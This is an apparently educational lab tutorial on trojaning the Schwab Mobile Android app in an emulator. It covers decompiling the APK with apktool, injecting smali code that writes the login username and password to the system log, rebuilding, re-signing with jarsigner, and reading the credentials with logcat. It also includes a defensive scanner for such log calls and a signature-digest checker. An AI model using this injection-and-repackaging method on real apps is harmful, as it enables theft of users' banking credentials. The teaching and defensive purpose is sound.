Decompiling and Trojaning an Android App with Smali Code

Don't Be Evil

This is a nasty thing to do. Only distribute your trojaned apps in controlled test environments!

Please be responsible in how you use this information! If you commit crimes, I won't be able to save you.

What You Need for This Project


We'll take an Android app and modify it to steal passwords.

This version just puts the passwords in the log, which is easy but not very dangerous.

A later project will post the stolen passwords on the Internet, which is a lot scarier.

Installing a Real App on the Emulated Phone

Launch Genymotion. Open the Google Play store and install Schwab Mobile, as shown below.

Finding ADB

On your host machine, open a Terminal or Command Prompt window.

Execute these commands, changing the path in the first command to your correct SDK path.

Note: To find your SDK path, open Android Studio and click Tools, Android, "SDK Manager".

Here are common examples of SDK paths:

NOTE: If you are using Windows, remove the "./" before "adb".

cd /Users/sambowne/Library/Android/sdk

cd platform-tools

./adb devices -l

Note that the last character is a lower case L, not the numeral one.

You should see a device listed, as shown below.


If Genymotion is not running, try these troubleshooting steps.
  • Make sure the Genymotion device is running and connected to the Internet. Open the Web browser and see if you can view Web pages.
  • Try issuing these commands:
    ./adb kill-server

    ./adb start-server

  • Find the device's IP address in Settings, Wi-Fi, and connect to it with this command, replacing the IP address with the correct address from Genymotion:
    ./adb connect

Pulling the APK File from the Android Emulator

Working in your sdk/platform-tools directory, execute these commands to pull the APK file from the emulator. If you are using another app, you will have to modify these commands accordingly.
./adb shell pm list packages | grep wab

./adb shell pm path

./adb pull /data/app/

Move the APK file to some convenient directory to work in, such as Downloads.

Disassembling an APK with apktool

If you are using Kali Linux, you already have apktool.

Otherwise, go to

Download the latest version. When I did it on 2-1-15, it was "apktool_2.0.0rc3.jar".

Save the file in the same folder you used for the APK file, such as Downloads.

Open a Command Prompt or Terminal.

Change directory to the location you placed the downloaded file and open it with java, as shown below.

cd Downloads

java -jar apktool_2.0.0rc3.jar d

Messages appear as apktool disassembles the app, as shown below.

Exploring the Smali Code

After decoding, the Dalvik bytecode appears in a folder named "", in a subfolder named "smali". There are hundreds of files in many directories here. Notice that Schwab doesn't use any obfuscation at all: all the files and folders have readable names. They don't even bother to use the free "ProGuard" tool built into Android Studio to protect their code.

Finding Interesting Code with Grep

Start in the directory containing your APK file, such as Downloads.

Execute these commands:


grep -r username smali | more

This searches for the string "username" in the smali code.

One place it's found is in the SessionManagementService.smali file, as shown below.

Search Terms

When trojaning financial apps, I found that these terms worked well.

I usually search with "grep -ir" to be case insensitive and recursive.

Viewing Smali Code

Open Finder or Windows Explorer and navigate to your Downloads folder.

Navigate to the SessionManagementService.smali file and open it in a text editor.

Find the "performLogIn" function, as shown below. This function has two parameters that look interesting: p2 and p3.

To demonstrate the vulnerability, we'll put the username and password into the Android log. That is a famously insecure place to put them, because any app on the device can see them.

To do that, add this code to the file, as shown below.

# Write the username (parameter p2) to the Android log at error level, with a recognizable tag
const-string v0, "TROJAN STEALING USERNAME:"
invoke-static {v0, p2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
# Write the password (parameter p3) the same way
const-string v0, "TROJAN STEALING PASSWORD:"
invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
Modify the file to steal the username and password, as shown below.

Save the modified file.
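The same pattern seen from the defender's side, as an added example that is not part of the original project: this Python scanner walks smali text and flags Landroid/util/Log; calls whose tag came from a const-string containing a credential-like word, or which pass a method parameter register (p2, p3 above) straight into the log. The smali sample is constructed from the performLogIn snippet above, and the keyword list is an assumption.

```python
import re

# Constructed sample: the performLogIn method with the injected Log calls plus one harmless debug log.
SAMPLE_SMALI = """\
.method public performLogIn(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;)V
    .locals 1
    const-string v0, "TROJAN STEALING USERNAME:"
    invoke-static {v0, p2}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    const-string v0, "TROJAN STEALING PASSWORD:"
    invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    const-string v0, "login started"
    invoke-static {v0, v0}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
"""

SENSITIVE = ("password", "passwd", "username", "pin", "token", "secret")  # assumed word list
METHOD_RE = re.compile(r"^\.method\s+((?:[\w$]+\s+)*)([\w$<>]+)\(")
CONST_RE = re.compile(r'^const-string(?:/jumbo)?\s+([vp]\d+),\s+"(.*)"$')
LOG_RE = re.compile(r"^invoke-static\s+\{([^}]*)\},\s+Landroid/util/Log;->(\w+)\(")

def find_sensitive_log_calls(smali_text):
    """Return (line_no, method, level, registers, tag) for each android.util.Log call
    whose tag/message register last held a const-string with a sensitive word, or
    which passes a method parameter register (pN) directly to the log."""
    findings, regs, method, is_static = [], {}, None, False
    for no, raw in enumerate(smali_text.splitlines(), 1):
        line = raw.strip()
        m = METHOD_RE.match(line)
        if m:                                   # new method: reset register tracking
            is_static = "static" in m.group(1).split()
            method, regs = m.group(2), {}
            continue
        m = CONST_RE.match(line)
        if m:                                   # remember the last string put in a register
            regs[m.group(1)] = m.group(2)
            continue
        m = LOG_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group(1).split(",") if a.strip()]
        strings = [regs.get(a, "") for a in args]
        sensitive_tag = any(w in s.lower() for s in strings for w in SENSITIVE)
        # p0 is 'this' in instance methods; every other pN is a caller-supplied argument
        leaks_param = any(a.startswith("p") and (is_static or a != "p0") for a in args)
        if sensitive_tag or leaks_param:
            findings.append((no, method, m.group(2), args, strings[0] if strings else ""))
    return findings
```

Run it over every file under the smali directory to get a list of places where user-supplied values reach the system log, which is the defect this project plants.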

Rebuilding the App

Now we need to rebuild the APK file from the modified smali code. This will create a "dist" subdirectory containing an APK file.

The easiest way to do that is to start from the decompiled app's home directory, which is where you left off after performing the "grep" command.

In a Terminal or Command Prompt, execute this command:

java -jar ../apktool_2.0.0rc3.jar b .

Re-Signing the APK

Since the code has changed, the old signature is invalid. We must sign it again.

To do that, we'll use the "jarsigner" tool, part of the Java Development Kit.

In a Terminal or Command Prompt, execute this command.

You will have to adjust the path after "-keystore" to match the location of your signing certificate.

I recommend that you copy your signing certificate to the Downloads folder to make this easier.

The last parameter is your key's Alias.

Execute this command:

jarsigner -keystore ../p9cert.jks dist/* proj9key
When you are prompted to, enter the key store password you chose earlier.
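To see concretely why the old signature stops validating once classes.dex changes, here is an added example (not from the page, apktool or jarsigner) that recomputes the per-entry digests recorded in META-INF/MANIFEST.MF, the first layer of the JAR (v1) signature that jarsigner writes. The sample APK is a constructed zip carrying only a manifest, so this models the digest layer alone, not the .SF file or the signer certificate.

```python
import base64
import hashlib
import io
import re
import zipfile

def _parse_manifest(text):
    """Map each 'Name:' entry to (hash algorithm, base64 digest) from its *-Digest line."""
    entries, name = {}, None
    for line in re.sub(r"\r?\n ", "", text).splitlines():  # join wrapped continuation lines
        if line.startswith("Name: "):
            name = line[6:]
        elif name is not None and "-Digest: " in line:
            algo, b64 = line.split("-Digest: ", 1)
            entries[name] = (algo.replace("-", "").lower(), b64.strip())  # SHA1 / SHA-256
        elif not line:                      # blank line ends the per-entry section
            name = None
    return entries

def verify_manifest_digests(apk_bytes):
    """Recompute every digest listed in META-INF/MANIFEST.MF; return {entry: matches}."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8")
        results = {}
        for name, (algo, expected) in _parse_manifest(manifest).items():
            actual = base64.b64encode(hashlib.new(algo, z.read(name)).digest()).decode()
            results[name] = actual == expected
    return results

def build_sample_apk(files):
    """Constructed stand-in for a jarsigner-signed APK: entries plus a SHA1 manifest
    (no .SF/.RSA, so only the digest layer of the v1 signature is modelled)."""
    buf, manifest = io.BytesIO(), "Manifest-Version: 1.0\r\n\r\n"
    with zipfile.ZipFile(buf, "w") as z:
        for name, data in files.items():
            z.writestr(name, data)
            digest = base64.b64encode(hashlib.sha1(data).digest()).decode()
            manifest += f"Name: {name}\r\nSHA1-Digest: {digest}\r\n\r\n"
        z.writestr("META-INF/MANIFEST.MF", manifest)
    return buf.getvalue()

def replace_entry(apk_bytes, name, new_data):
    """Swap one entry but keep the old META-INF, i.e. changed code under the old signature."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            dst.writestr(info.filename, new_data if info.filename == name else src.read(info))
    return out.getvalue()
```

Pointed at a real pulled APK, verify_manifest_digests reports which entries no longer match what the original signer digested; a package manager checks this layer (and the signer certificate) before it will treat a rebuilt APK as an update of the installed one.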


If you see "jarsigner not found", you are probably using Windows. The Java installer does not set these up for you, so you need to set two environment variables manually.

Click Start, Computer.

Navigate to C:\Program Files\java and find out the full path to your jdk folder.

It will be something like C:\Program Files\Java\jdk1.7.0_75

Now execute this command at an Administrator command prompt, with the correct jdk version. Do not put quotes around the path: with "set", the quotes would become part of the value. Also note that "set" only affects the current command prompt window; to make it permanent, add JAVA_HOME in the same Environment Variables dialog used for PATH below.

set JAVA_HOME=C:\Program Files\Java\jdk1.7.0_75
You also need to add this path to the PATH environment variable.

To do that, click Start, right-click Computer, click Properties, "Advanced System Settings", "Environment Variables".

Ensure that PATH is selected, and click "Edit...".

At the end of the path, insert this line, with the correct jdk version:

;C:\Program Files\Java\jdk1.7.0_75\bin
Then log out and log in again.

Installing the Modified App

Drop the APK file from the dist subdirectory onto your Genymotion Android device and install it.

A box tells you it must uninstall the existing app first. Click OK.

Monitoring the Log

From the sdk/platform-tools directory, execute this command:
./adb logcat
A lot of messages scroll by. To focus on messages that came from the trojan code, press Ctrl+C to stop the running logcat and execute this command:
./adb logcat | grep TROJAN

Entering Data into the Trojaned App

The app launches. In the "What was new" box, click Close.

The Schwab app main window appears, as shown below.

In the top left, click the three-line icon just to the left of the blue "charles SCHWAB" logo.

Click "Log in".

Enter fake credentials, as shown below. Click "Log in".

Viewing the Stolen Data

Your Terminal window should show the stolen data, as shown below.


How to unpack / pack an APK file

Dancing with dalvik

ExploitMe Mobile Android Labs

Posted 6-13-15 by Sam Bowne
Modified 7-12-15